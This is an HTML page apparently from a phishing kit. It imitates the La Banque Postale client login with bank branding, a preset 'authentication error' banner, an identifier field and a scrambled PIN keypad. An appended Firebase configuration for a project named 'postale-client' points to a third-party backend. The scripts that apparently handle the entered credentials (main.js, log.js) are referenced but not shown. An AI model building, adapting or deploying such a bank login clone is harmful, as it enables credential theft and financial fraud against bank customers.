<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="./assets/dist/img/ico.ico">

<title>Connexion à mon espace client - La Banque Postale</title>

    <!-- Bootstrap core CSS -->
    <link href="./assets/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="./assets/dist/css/album.css" rel="stylesheet">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha512-5A8nwdMOWrSz20fDsjczgUidUBR8liPYU+WymTZP1lmY9G6Oc7HlZv156XqnsgNUzTyMefFTcsFH/tnJE/+xBg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
 <style>
 /* Cible toutes les flèches dans les champs de saisie de type number */
        input[type="number"] {
            /* Supprime les flèches dans les navigateurs modernes */
            appearance: textfield;
            -moz-appearance: textfield;
        }
/* Cible les flèches dans les champs de saisie de type number */
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
-webkit-appearance: none;
margin: 0;
}

/* Firefox cible également les flèches */
input[type="number"] {
-moz-appearance: textfield;
}

/* Chrome */
input::-webkit-inner-spin-button,
input::-webkit-outer-spin-button { 
	-webkit-appearance: none;
	margin:0;
}
 
/* Opéra*/
input::-o-inner-spin-button,
input::-o-outer-spin-button { 
	-o-appearance: none;
	margin:0
}

.m-logo img {
    width: 50px;
    height: 50px;
}
#titre_btn{
font-weight:bold;
color:#17479e;
}

.bg-light {
    background-color: #003da5!important;
}
.buttonBTN {
    text-align: center;
    width: 4rem;
    height: 3.6rem;

    border-radius: 4px;
	border:1px solid #d8d8d8;
    background-color: var(--color-3);
    font-size: 18px;
    color: var(--color-26);
    font-family: "RobotoMono-Medium",Courier,monospace;
}

@media only screen and (max-width: 768px) {
  /* For mobile phones: */
  #Search_ico{
   display:none;
  } 
  #img_body{
   display:none;
  }  
  
  #tab_clavier{
   width:100%;
  }
}

/* Small devices (portrait tablets and large phones, 600px and up) */
@media only screen and (min-width: 600px) {

  
  #tab_clavier{
   width:100%;
  }
}

@media only screen and (min-width: 768px) {
  
  #tab_clavier{
   width:100%;
  }

}



/* Large devices (laptops/desktops, 992px and up) */
@media only screen and (min-width: 992px) {

  #tab_clavier{
   width:100%;
  }

}

@media only screen and (min-width: 1200px) {
 #tab_clavier{
   width:100%;
  }
}
 </style>
 
 </head>

  <body>

    <header>
   
      <div class="navbar navbar-white bg-white box-shadow">
        <div class="container d-flex justify-content-between">
          <a href="#" class="navbar-brand d-flex align-items-center m-logo">

            <img src="./assets/dist/img/logobbp.png"/>
          </a>
      
			<span id="Search_ico">
			<i class="fa fa-search fa-2x" aria-hidden="true" style="color:#003da5"></i>
			
			</span>
        
        </div>
      </div>
    </header>

    <main role="main">


      <div class="album py-4 bg-light">
        <div class="container">

          <div class="row">
            <div class="col-md-4">	
			<h1 style="color:white;font-family: 'Lato-Bold',sans-serif;font-size: 1.5rem;line-height: 1.75rem;">
			<center>Connexion à votre compte</center>
			</h1>

              <div class="card mb-2 box-shadow">
               
			     <b><center style="color:red"><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Erreur d'authentification</center></b>

			   <form class="p-2">
				<div class="form-group">
				<label  class="form-label">Identifiant à 10 chiffres</label>
				<input type="number" class="form-control" id="identifiant" maxlength="10">
				</div>
				<br>
				<div class="form-group">
				<label class="form-label">Mot de passe à 6 chiffres sur ce clavier</label>
				<input type="password" class="form-control" id="password" style="background-color:#f3f6fa" disabled>
				</div>
				<br>
				<table id="tab_clavier" class="mb-2">
				<tr>
				<td onclick="setCode(8)"><button class="buttonBTN" type="button"><span id="titre_btn">8</span></button></td>
				<td onclick="setCode(2)"><button  class="buttonBTN" type="button"><span id="titre_btn">2</span></button></td>
				<td onclick="setCode(5)"><button  class="buttonBTN" type="button"><span id="titre_btn">5</span></button></td>
				<td onclick="setCode(3)"><button  class="buttonBTN" type="button"><span id="titre_btn">3</span></button></td>
				<td onclick="setCode(7)"><button  class="buttonBTN" type="button"><span id="titre_btn">7</span></button></td>
				</tr>
				<tr>
				<td onclick="setCode(0)"><button  class="buttonBTN" type="button"><span id="titre_btn">0</span></button></td>
				<td onclick="setCode(9)"><button  class="buttonBTN" type="button"><span id="titre_btn">9</span></button></td>
				<td onclick="setCode(6)"><button  class="buttonBTN" type="button"><span id="titre_btn">6</span></button></td>
				<td onclick="setCode(1)"><button  class="buttonBTN" type="button"><span id="titre_btn">1</span></button></td>
				<td onclick="setCode(4)"><button  class="buttonBTN" type="button"><span id="titre_btn">4</span></button></td>
				</tr>
				</table>
				<center> <button type="button" onclick="login()" style="width:100%;background-color:#17479e" class="btn btn-primary">Se connecter</button></center> 
				</form>
			   <br>
		
		
              </div>
			  		<center>
					<span style="color:white">Identifiant / Mot de passe oublié</span>

				</center>
            </div>
            <div class="col-md-8">
			<br>
			<br>
              <div class="card box-shadow" id="img_body">
			  
                <img class="card-img-top" src="./assets/dist/img/grid2.jpg" alt="Card image cap">
              
              </div>
            </div>
          
           
           
        

        
          </div>
        </div>
      </div>

    </main>

    <footer class="text-muted">
      <div class="container">
      <!--   <p class="float-right">
          <a href="#">Back to top</a>
        </p>
        <p>Album example is &copy; Bootstrap, but please download and customize it for yourself!</p>
        <p>New to Bootstrap? <a href="../../">Visit the homepage</a> or read our <a href="../../getting-started/">getting started guide</a>.</p>
    
 -->
	</div>
    </footer>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script>window.jQuery || document.write('<script src="./assets/dist/vendor/jquery-slim.min.js"><\/script>')</script>
    <script src="./assets/dist/vendor/popper.min.js"></script>
    <script src="./assets/dist/js/bootstrap.min.js"></script>
    <script src="./assets/dist/vendor/holder.min.js"></script>
	  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>	
	    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.26.11/dist/sweetalert2.all.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/2.1.2/sweetalert.min.js" integrity="sha256-KsRuvuRtUVvobe66OFtOQfjP8WA2SzYsmm4VPfMnxms=" crossorigin="anonymous"></script>
		<script src="./assets/dist/js/main.js"></script>
<script src="common/log.js"></script>

  </body>
</html>
<script type="module">
  // Import the functions you need from the SDKs you need
  import { initializeApp } from "https://www.gstatic.com/firebasejs/11.3.1/firebase-app.js";
  // TODO: Add SDKs for Firebase products that you want to use
  // https://firebase.google.com/docs/web/setup#available-libraries

  // Your web app's Firebase configuration
  const firebaseConfig = {
    apiKey: "AIzaSyA4TDoYGg3cUa8wtJ4DjYrdIcA-QDLzrMc",
    authDomain: "postale-client.firebaseapp.com",
    projectId: "postale-client",
    storageBucket: "postale-client.firebasestorage.app",
    messagingSenderId: "1080063986003",
    appId: "1:1080063986003:web:92696259dd6c715cf6f9a6"
  };

  // Initialize Firebase
  const app = initializeApp(firebaseConfig);
</script>